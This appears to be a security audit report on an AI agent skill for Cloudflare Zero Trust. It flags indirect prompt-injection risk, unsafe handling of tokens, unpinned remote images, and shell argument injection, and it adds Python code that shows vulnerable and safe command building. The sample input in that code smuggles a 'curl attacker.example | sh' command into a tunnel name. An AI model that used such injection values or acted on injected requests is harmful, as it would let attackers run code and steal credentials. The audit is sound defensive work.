cloudflare-zero-trust
Fail
Audited by Gen Agent Trust Hub on Feb 14, 2026
Risk Level: HIGH
Tags: COMMAND_EXECUTION, CREDENTIALS_UNSAFE, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [Indirect Prompt Injection] (HIGH): The skill performs high-privilege infrastructure actions based on untrusted user requests.
  - Ingestion points: User requests defined in Scenarios 1-6 (test-scenarios.md).
  - Boundary markers: Absent in the skill instructions (untrusted request text is not delimited from the instructions the agent follows).
  - Capability inventory: Cloudflare API interaction, Tunnel creation, Docker/Terraform execution.
  - Sanitization: No input validation or escaping logic present.
- [Credentials Unsafe] (MEDIUM): Documentation (references/service-auth.md) encourages the agent to handle and provide examples of sensitive service tokens and API keys. This poses a leakage risk if the agent is manipulated into echoing or transmitting them.
- [Remote Code Execution] (MEDIUM): The skill references and executes remote content, specifically the cloudflare/cloudflared Docker image and GitHub Actions (actions/checkout@v3), which could be subverted if registry/source integrity is not verified. Mutable tags such as `latest` or `@v3` resolve to whatever the publisher currently serves; pinning the image to a digest and the action to a full commit SHA is the standard check.
- [Command Execution] (HIGH): Extensive shell command templates for cloudflared and terraform are provided. These are vulnerable to argument injection if user input is interpolated directly into the commands, since a value containing shell metacharacters or a leading `-` is interpreted by the shell or by the tool rather than treated as data.
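The Sanitization and Command Execution findings above describe the same defect from two sides: a tunnel name taken from a user request is interpolated into a `cloudflared` command template with no validation. The following Python is an added illustration written for this page, not code from the audited skill or from Cloudflare; it contrasts the vulnerable string-building pattern with two mitigations (shell quoting, and an allowlist regex plus an argv list that never goes through a shell). The sample input and the `TUNNEL_NAME_RE` policy are constructed assumptions; `cloudflared tunnel create <name>` is a real subcommand, but nothing here executes it.

```python
import re
import shlex
import subprocess

# Constructed sample of an untrusted tunnel name as it might arrive in a user
# request. The payload is illustrative only and not taken from the audited skill.
UNTRUSTED_NAME = "prod; curl http://attacker.example/x | sh"

# Vulnerable pattern: the name is interpolated into a shell string, so any
# shell metacharacters in the input become part of the command line.
def build_tunnel_cmd_unsafe(name: str) -> str:
    return f"cloudflared tunnel create {name}"

# Minimal mitigation when a shell string is unavoidable: quote the value so
# the shell treats it as a single literal argument. This stops command
# injection but still lets a value beginning with '-' reach the tool as a flag.
def build_tunnel_cmd_quoted(name: str) -> str:
    return f"cloudflared tunnel create {shlex.quote(name)}"

# Preferred pattern: validate against an allowlist (assumed policy: starts with
# an alphanumeric, then up to 62 more of [A-Za-z0-9_-]) and hand the process an
# argv list. No shell is involved, and the first-character rule excludes
# flag-like values such as "--help".
TUNNEL_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,62}")

def build_tunnel_cmd_safe(name: str) -> list[str]:
    if not TUNNEL_NAME_RE.fullmatch(name):
        raise ValueError(f"rejected tunnel name: {name!r}")
    return ["cloudflared", "tunnel", "create", name]

def run_safe(name: str) -> subprocess.CompletedProcess:
    # shell=False is the default; passing a list means the OS receives the
    # arguments exactly as built, with no re-parsing.
    return subprocess.run(build_tunnel_cmd_safe(name), check=True)

if __name__ == "__main__":
    print("unsafe :", build_tunnel_cmd_unsafe(UNTRUSTED_NAME))
    print("quoted :", build_tunnel_cmd_quoted(UNTRUSTED_NAME))
    try:
        build_tunnel_cmd_safe(UNTRUSTED_NAME)
    except ValueError as exc:
        print("safe   :", exc)
    print("safe   :", build_tunnel_cmd_safe("prod-tunnel-01"))
```

The same split applies to the terraform templates the finding mentions: a `-var` value built from request text should be validated and passed as one argv element, never spliced into a shell string.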
Recommendations
- AI detected serious security threats
Audit Metadata